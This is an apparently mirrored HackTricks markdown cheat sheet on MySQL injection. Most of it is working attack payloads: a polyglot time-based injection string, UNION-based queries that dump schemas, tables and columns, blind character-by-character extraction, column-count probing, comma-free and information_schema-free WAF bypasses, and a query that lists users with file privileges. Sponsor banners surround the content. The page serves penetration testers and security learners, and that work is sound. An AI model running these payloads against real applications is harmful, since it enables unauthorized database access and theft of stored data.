mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 20:13:37 +00:00
226 lines
10 KiB
Markdown
226 lines
10 KiB
Markdown
# MySQL injection
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|
||
|
||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||
|
||
{% embed url="https://www.rootedcon.com/" %}
|
||
|
||
## Comments
|
||
|
||
```sql
|
||
-- MYSQL Comment
|
||
# MYSQL Comment
|
||
/* MYSQL Comment */
|
||
/*! MYSQL Special SQL */
|
||
/*!32302 10*/ Comment for MySQL version 3.23.02
|
||
```
|
||
|
||
## Interesting Functions
|
||
|
||
### Confirm Mysql:
|
||
|
||
```
|
||
concat('a','b')
|
||
database()
|
||
version()
|
||
user()
|
||
system_user()
|
||
@@version
|
||
@@datadir
|
||
rand()
|
||
floor(2.9)
|
||
length(1)
|
||
count(1)
|
||
```
|
||
|
||
### Useful functions
|
||
|
||
```sql
|
||
SELECT hex(database())
|
||
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
|
||
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
|
||
SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
|
||
SELECT replace(database(),"r","R")
|
||
SELECT substr(database(),1,1)='r'
|
||
SELECT substring(database(),1,1)=0x72
|
||
SELECT ascii(substring(database(),1,1))=114
|
||
SELECT database()=char(114,101,120,116,101,115,116,101,114)
|
||
SELECT group_concat(<COLUMN>) FROM <TABLE>
|
||
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
|
||
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
|
||
strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
|
||
```
|
||
|
||
## All injection
|
||
|
||
```sql
|
||
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
|
||
```
|
||
|
||
from [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
||
|
||
## Flow
|
||
|
||
Remember that in "modern" versions of **MySQL** you can substitute "_**information\_schema.tables**_" for "_**mysql.innodb\_table\_stats**_**"** (This could be useful to bypass WAFs).
|
||
|
||
```sql
|
||
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
|
||
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
|
||
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
|
||
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
|
||
```
|
||
|
||
### **Only 1 value**
|
||
|
||
* `group_concat()`
|
||
* `Limit X,1`
|
||
|
||
### **Blind one by one**
|
||
|
||
* `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
|
||
* `mid(version(),X,1)='5'`
|
||
|
||
### **Blind adding**
|
||
|
||
* `LPAD(version(),1...lenght(version()),'1')='asd'...`
|
||
* `RPAD(version(),1...lenght(version()),'1')='asd'...`
|
||
* `SELECT RIGHT(version(),1...lenght(version()))='asd'...`
|
||
* `SELECT LEFT(version(),1...lenght(version()))='asd'...`
|
||
* `SELECT INSTR('foobarbar', 'fo...')=1`
|
||
|
||
## Detect number of columns
|
||
|
||
Using a simple ORDER
|
||
|
||
```
|
||
order by 1
|
||
order by 2
|
||
order by 3
|
||
...
|
||
order by XXX
|
||
|
||
UniOn SeLect 1
|
||
UniOn SeLect 1,2
|
||
UniOn SeLect 1,2,3
|
||
...
|
||
```
|
||
|
||
|
||
|
||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||
|
||
{% embed url="https://www.rootedcon.com/" %}
|
||
|
||
## MySQL Union Based
|
||
|
||
```sql
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||
```
|
||
|
||
## SSRF
|
||
|
||
**Learn here different options to** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
|
||
|
||
## WAF bypass tricks
|
||
|
||
### Information\_schema alternatives
|
||
|
||
Remember that in "modern" versions of **MySQL** you can substitute _**information\_schema.tables**_ for _**mysql.innodb\_table\_stats**_\*\* \*\* or for _**sys.x$schema\_flattened\_keys**_ or for **sys.schema\_table\_statistics**
|
||
|
||
![](<../../../.gitbook/assets/image (154).png>)
|
||
|
||
![](<../../../.gitbook/assets/image (155).png>)
|
||
|
||
### MySQLinjection without COMMAS
|
||
|
||
Select 2 columns without using any comma ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
|
||
|
||
```
|
||
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
|
||
```
|
||
|
||
### Retrieving values without the column name
|
||
|
||
If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:
|
||
|
||
```bash
|
||
# When a True is returned, you have found the number of columns
|
||
select (select "", "") = (SELECT * from demo limit 1); # 2columns
|
||
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
|
||
```
|
||
|
||
Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
|
||
|
||
```bash
|
||
# When True, you found the correct char and can start ruteforcing the next position
|
||
select (select 1, 'flaf') = (SELECT * from demo limit 1);
|
||
```
|
||
|
||
More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
|
||
|
||
### MySQL history
|
||
|
||
You ca see other executions inside the MySQL reading the table: **sys.x$statement\_analysis**
|
||
|
||
### Version alternative**s**
|
||
|
||
```
|
||
mysql> select @@innodb_version;
|
||
+------------------+
|
||
| @@innodb_version |
|
||
+------------------+
|
||
| 5.6.31 |
|
||
+------------------+
|
||
|
||
mysql> select @@version;
|
||
+-------------------------+
|
||
| @@version |
|
||
+-------------------------+
|
||
| 5.6.31-0ubuntu0.15.10.1 |
|
||
+-------------------------+
|
||
|
||
mysql> mysql> select version();
|
||
+-------------------------+
|
||
| version() |
|
||
+-------------------------+
|
||
| 5.6.31-0ubuntu0.15.10.1 |
|
||
+-------------------------+
|
||
```
|
||
|
||
|
||
|
||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||
|
||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||
|
||
{% embed url="https://www.rootedcon.com/" %}
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|